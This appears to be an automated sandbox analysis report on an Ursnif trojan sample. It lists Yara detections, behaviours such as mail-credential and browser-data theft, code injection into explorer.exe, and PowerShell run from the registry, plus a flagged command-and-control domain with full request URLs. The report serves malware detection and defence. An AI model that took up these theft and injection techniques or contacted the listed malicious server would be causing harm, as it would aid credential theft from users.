Source: Yara match File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000006
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 527488 Sample: FpYf5EGDO9.exe Startdate: 23/11/2021 Architecture: WINDOWS Score: 100 87 Found malware configuration 2->87 89 Multi AV Scanner detection for submitted file 2->89 91 Sigma detected: Powershell run code from registry 2->91 93 10 other signatures 2->93 9 FpYf5EGDO9.exe 1 12 2->9         started        13 mshta.exe 19 2->13         started        process3 dnsIp4 79 soderunovos.website 89.44.9.140, 443, 49751, 49753 M247GB Romania 9->79 81 new-fp-shed.wg1.b.yahoo.com 87.248.100.216, 443, 49748 YAHOO-IRDGB United Kingdom 9->81 85 2 other IPs or domains 9->85 113 Detected unpacking (changes PE section rights) 9->113 115 Detected unpacking (overwrites its own PE header) 9->115 117 Writes to foreign memory regions 9->117 121 4 other signatures 9->121 15 control.exe 1 9->15         started        83 192.168.2.1 unknown unknown 13->83 119 Suspicious powershell command line found 13->119 18 powershell.exe 30 13->18         started        signatures5 process6 file7 123 Changes memory attributes in foreign processes to executable or writable 15->123 125 Injects code into the Windows Explorer (explorer.exe) 15->125 127 Writes to foreign memory regions 15->127 129 Allocates memory in foreign processes 15->129 21 explorer.exe 15->21 injected 25 rundll32.exe 15->25         started        61 C:\Users\user\AppData\...\i1aaekli.cmdline, UTF-8 18->61 dropped 131 Modifies the context of a thread in another process (thread injection) 18->131 133 Maps a DLL or memory area into another process 18->133 135 Creates a thread in another existing process (thread injection) 18->135 27 csc.exe 3 18->27         started        30 csc.exe 3 18->30         started        32 conhost.exe 18->32         started        signatures8 process9 dnsIp10 73 lycos.com 21->73 75 ds-ats.member.g02.yahoodns.net 212.82.100.140, 443, 49821 YAHOO-IRDGB United Kingdom 21->75 77 4 other IPs or domains 21->77 103 System process connects to network (likely due to code injection or exploit) 21->103 105 Tries to steal Mail credentials (via file / registry access) 21->105 107 Changes memory attributes in foreign processes to executable or writable 21->107 111 8 other signatures 21->111 34 cmd.exe 21->34         started        37 cmd.exe 21->37         started        39 cmd.exe 21->39         started        45 6 other processes 21->45 63 C:\Users\user\AppData\Local\...\i1aaekli.dll, PE32 27->63 dropped 41 cvtres.exe 1 27->41         started        65 C:\Users\user\AppData\Local\...\4v5gswf4.dll, PE32 30->65 dropped 43 cvtres.exe 30->43         started        file11 109 May check the online IP address of the machine 73->109 signatures12 process13 signatures14 95 Uses ping.exe to sleep 34->95 97 Uses ping.exe to check the status of other devices and networks 34->97 99 Uses nslookup.exe to query domains 34->99 47 conhost.exe 34->47         started        49 PING.EXE 34->49         started        51 nslookup.exe 37->51         started        55 conhost.exe 37->55         started        57 conhost.exe 39->57         started        59 conhost.exe 45->59         started        process15 dnsIp16 67 222.222.67.208.in-addr.arpa 51->67 69 resolver1.opendns.com 51->69 71 myip.opendns.com 51->71 101 May check the online IP address of the machine 51->101 signatures17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
89.44.9.140
 soderunovos.website Romania
9009 M247GB true
74.6.143.26
 yahoo.com United States
26101 YAHOO-3US false
209.202.254.90
 lycos.com United States
6354 LYCOSUS false
87.248.118.22
 edge.gycpi.b.yahoodns.net United Kingdom
203220 YAHOO-DEBDE false
87.248.100.216
 new-fp-shed.wg1.b.yahoo.com United Kingdom
34010 YAHOO-IRDGB false
212.82.100.140
 ds-ats.member.g02.yahoodns.net United Kingdom
34010 YAHOO-IRDGB false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
new-fp-shed.wg1.b.yahoo.com 87.248.100.216 true
myip.opendns.com 84.17.52.63 true
lycos.com 209.202.254.90 true
resolver1.opendns.com 208.67.222.222 true
ds-ats.member.g02.yahoodns.net 212.82.100.140 true
yahoo.com 74.6.143.26 true
edge.gycpi.b.yahoodns.net 87.248.118.22 true
soderunovos.website 89.44.9.140 true
www.lycos.com 209.202.254.90 true
www.yahoo.com unknown unknown
mail.yahoo.com unknown unknown
222.222.67.208.in-addr.arpa unknown unknown
login.yahoo.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ false
    		high
    https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw false
    • Avira URL Cloud: safe
    		 unknown
    https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw false
      		unknown
      https://lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg false
        		high
        https://mail.yahoo.com/images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif false
          		high
          https://login.yahoo.com/?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif false
            		high
            https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg false
              		high
              https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw false
                		unknown